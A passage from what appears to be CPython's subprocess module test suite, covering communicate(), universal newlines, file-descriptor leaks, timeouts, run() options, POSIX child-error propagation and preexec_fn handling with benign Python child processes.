(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
